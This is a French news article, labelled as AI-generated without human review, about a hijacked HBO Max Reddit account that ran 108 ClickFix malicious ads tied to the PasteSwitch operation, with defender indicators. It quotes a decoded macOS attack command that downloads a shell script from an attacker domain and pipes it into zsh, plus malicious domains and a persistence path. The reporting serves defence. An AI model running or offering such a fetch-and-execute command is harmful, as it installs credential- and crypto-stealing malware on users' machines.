Un compte Reddit piraté de HBO Max a diffusé 108 publicités malveillantes ClickFix

Le compte Reddit HBO Max piraté a diffusé 108 pubs ClickFix piégeant Windows et macOS pour voler identifiants et cryptos via PasteSwitch.

Texte généré par intelligence artificielle, publié sans relecture humaine. Transparence IA

Un compte Reddit piraté de HBO Max a diffusé 108 publicités malveillantes ClickFix
Malware

Image d’illustration générée par IA

Des attaquants ont compromis le compte Reddit vérifié de HBO Max et exploité son identité de confiance pour diffuser des publicités malveillantes visant les utilisateurs de Windows et de macOS.

Un rapport publié le 14 septembre 2026 détaille 108 publicités malveillantes publiées depuis le compte u/hbomax sur une période d’environ 48 heures. Des chercheurs de Hudson Rock et d’ADAMnetworks ont établi un lien entre cette activité et PasteSwitch, une vaste opération malveillante reposant sur des techniques d’ingénierie sociale ClickFix.

Les publicités ne s’appuyaient pas sur des téléchargements malveillants classiques. Les victimes étaient plutôt invitées à copier des commandes dans Windows Run, PowerShell ou macOS Terminal, ce qui permettait aux attaquants d’exploiter la confiance des utilisateurs dans les outils de leur système d’exploitation.

Un compte vérifié transformé en canal de diffusion de malwares

La première publicité identifiée faisait la promotion de ce qui semblait être une application HBO Max native pour macOS. Elle redirigeait les utilisateurs vers hbomaxx[.]us, un site conçu pour ressembler à une page officielle de téléchargement de logiciels.

Cliquer sur les boutons d’inscription ou de téléchargement ne lançait pas un programme d’installation classique. La page affichait à la place des instructions invitant à ouvrir Terminal et à y coller une commande fournie.

Les chercheurs ont identifié plusieurs autres destinations promues depuis le compte Reddit compromis :

  • 40 publicités redirigeaient les utilisateurs vers hbomaxx[.]app
  • 36 faisaient la promotion du faux site de services d’IA et de développement codex-craft[.]com
  • 15 pointaient vers apple.clean-disk-guide[.]com
  • 11 redirigeaient vers code-desktop[.]com
  • Six faisaient la promotion de hbomax-macos[.]com

La campagne ne s’adressait donc pas uniquement aux personnes recherchant un logiciel HBO Max. Ses leurres visaient également les développeurs, les utilisateurs potentiels de services d’IA et les propriétaires de Mac à la recherche d’outils de nettoyage de disque ou d’utilitaires système.

L’utilisation d’un compte d’entreprise vérifié conférait aux publicités un puissant gage de légitimité. Les utilisateurs qui auraient pu rejeter un annonceur inconnu pouvaient raisonnablement supposer que les contenus publiés au nom de HBO Max avaient passé les contrôles de la marque et de la plateforme.

La méthode utilisée pour prendre le contrôle de u/hbomax reste inconnue. Rien ne permet non plus de confirmer que d’autres comptes de HBO ou de Warner Bros. Discovery, ou encore des systèmes internes, ont été compromis.

ClickFix transforme la victime en mécanisme d’exécution

Les attaques ClickFix dissimulent généralement l’exécution d’une commande derrière une étape courante de dépannage ou de vérification. Une page peut prétendre que l’utilisateur doit corriger une erreur, effectuer un CAPTCHA ou exécuter une commande pour installer un logiciel apparemment légitime.

Cette conception modifie le mode de diffusion. Au lieu de demander au navigateur de télécharger un fichier manifestement exécutable, l’attaquant persuade la victime d’ouvrir une interface locale de confiance et d’exécuter elle-même la charge utile.

Sur macOS, une des commandes observées pendant la campagne était dissimulée par un encodage Base64. Une fois décodée, elle devenait :

export _watch_v2=97d9d8dc;curl -sL "https://ember-bridge[.]com/curl/a44a37519au/setup.sh"| zsh

La commande crée la variable d’environnement _watch_v2, récupère un script shell depuis ember-bridge[.]com et transmet directement la réponse à l’interpréteur Z shell. Aucun examen du script téléchargé n’est nécessaire avant son exécution.

Hudson Rock a identifié ce domaine comme une infrastructure de diffusion de malwares associée à PasteSwitch. Le backend de l’opération peut sélectionner les campagnes, les charges utiles, les systèmes d’exploitation et les méthodes de vol de cryptomonnaies en fonction des caractéristiques du visiteur.

Cette flexibilité permet à une même opération publicitaire de proposer des chaînes d’attaque différentes aux systèmes Windows et macOS. Elle permet également aux opérateurs d’alterner entre le vol d’identifiants, le chargement de malwares, les fausses applications de portefeuille et la manipulation du presse-papiers.

Les charges utiles macOS ont volé des identifiants et des phrases de récupération de portefeuilles

PasteSwitch a diffusé MacSync, un voleur d’informations conçu pour collecter des données sensibles sur les appareils macOS. Il cible notamment les identifiants des navigateurs, les profils Firefox, les informations Telegram, Apple Notes et les mots de passe macOS.

Une autre chaîne installait un malware décrit comme « AMOS helper ». Celui-ci établit sa persistance à l’aide d’un répertoire nommé :

.com.apple.accountsd

Ce nom rappelle celui d’un composant système Apple, ce qui peut le rendre moins visible lors d’une vérification sommaire. Une fois installé, le malware peut enregistrer la machine auprès d’une infrastructure contrôlée par les attaquants et recevoir des tâches supplémentaires.

La campagne a également distribué de fausses applications de cryptomonnaie usurpant l’identité de Ledger, Trezor Suite et Exodus. Ces applications cherchaient à obtenir les phrases de récupération des portefeuilles, lesquelles peuvent donner à un attaquant le contrôle des cryptomonnaies associées sans nécessiter un accès prolongé à l’ordinateur infecté.

Ces différentes charges utiles peuvent produire plusieurs résultats à partir d’une même campagne publicitaire. Une victime peut perdre ses identifiants de navigateur, des données privées d’applications, ses mots de passe système ou ses actifs en cryptomonnaie. Un malware persistant peut également fournir un point d’appui pour des activités ultérieures.

Les chaînes Windows ont utilisé un contournement d’AMSI et une exécution uniquement en mémoire

Les utilisateurs de Windows ont été confrontés à des instructions faisant intervenir mshta et PowerShell. Tous deux sont des composants Windows légitimes, mais les attaquants les détournent fréquemment pour exécuter des scripts et récupérer des étapes supplémentaires.

Une chaîne identifiée utilisait un fichier polyglotte MP3/HTA : son contenu était conçu pour être interprété comme plusieurs types de fichiers selon la manière dont il était traité. La chaîne pouvait créer une tâche planifiée, lancer PowerShell en 32 bits et désactiver Microsoft Antimalware Scan Interface, ou AMSI.

Elle générait ensuite une infrastructure propre à chaque victime à partir du nom de l’ordinateur et du nom d’utilisateur. Du PowerShell obfusqué et du shellcode chargeaient finalement Amatera Stealer directement en mémoire.

Cette étape finale n’avait pas besoin d’être enregistrée au préalable sur le disque sous la forme d’un exécutable classique. Le chargement uniquement en mémoire réduit les traces accessibles aux outils de sécurité qui analysent principalement les nouveaux fichiers créés, même si la surveillance des terminaux peut toujours détecter les comportements associés.

PasteSwitch a également diffusé AnimateClipper et ZigClipper. Ces clipboard hijackers surveillent les adresses de cryptomonnaie copiées et les remplacent par des adresses contrôlées par les attaquants. Les chaînes de caractères des portefeuilles étant longues et difficiles à vérifier visuellement, les victimes peuvent valider la destination modifiée sans remarquer la substitution.

Les défenseurs doivent rechercher les commandes, la persistance et l’infrastructure

Reddit a suspendu les publicités signalées et transmis l’affaire à ses équipes Security and Safety. HBO et Warner Bros. Discovery avaient été contactés, mais aucune réponse n’avait été reçue au moment de la publication.

Il n’existe pas de correctif logiciel au problème central, car l’attaque repose principalement sur la compromission d’un compte et l’ingénierie sociale. Les organisations doivent combiner la recherche de menaces sur les terminaux avec un contrôle plus strict de leurs identités d’entreprise utilisées pour la publicité et les réseaux sociaux.

Les équipes de sécurité doivent bloquer ou analyser les connexions vers :

hbomaxx[.]us
hbomaxx[.]app
codex-craft[.]com
apple.clean-disk-guide[.]com
code-desktop[.]com
hbomax-macos[.]com
ember-bridge[.]com

Sur les terminaux macOS, les défenseurs doivent rechercher le répertoire de persistance .com.apple.accountsd, la variable d’environnement _watch_v2 et les accès à :

/curl/a44a37519au/setup.sh

Les données de télémétrie Windows doivent être examinées pour détecter l’exécution inhabituelle de mshta, la création de tâches planifiées, le lancement de PowerShell en 32 bits, la modification d’AMSI, les scripts obfusqués, le chargement de shellcode et les processus exécutant directement des charges utiles en mémoire.

Les investigations doivent également prendre en compte les indicateurs liés à MacSync, AMOS helper, Amatera Stealer, AnimateClipper et ZigClipper. Les utilisateurs de cryptomonnaies peuvent devoir vérifier si des phrases de récupération ont été saisies dans des applications suspectes et si des adresses de portefeuille copiées ont été modifiées avant les transactions.

Les identités vérifiées ne remplacent pas l’examen des commandes

Les utilisateurs doivent considérer comme potentiellement malveillante toute instruction les invitant à coller une commande dans Terminal, PowerShell ou Windows Run. Cela reste vrai lorsque l’instruction est présentée comme un CAPTCHA, un programme d’installation ou une procédure de réparation d’erreur.

Les organisations qui contrôlent des comptes de marque vérifiés doivent déployer une authentification multifacteur résistante au phishing, renouveler les identifiants exposés, révoquer les sessions non reconnues et vérifier les accès administratifs. La surveillance doit signaler toute création inattendue de publicité, tout volume inhabituel de campagnes ou toute modification effectuée en dehors des procédures habituelles.

L’incident HBO Max montre comment une identité compromise peut combler le déficit de confiance qui protège généralement les utilisateurs des domaines inconnus. La publicité peut sembler authentique. La commande collée reste pourtant déterminante pour ce que la machine exécute.

À lire aussi

Sources

Cet article est une réécriture originale fondée sur les sources ci-dessous.

Sujets liéscompte Reddit piratéHBO Max malwarepublicités ClickFixPasteSwitchvol identifiants macOSfausses apps crypto
Retour à l'accueil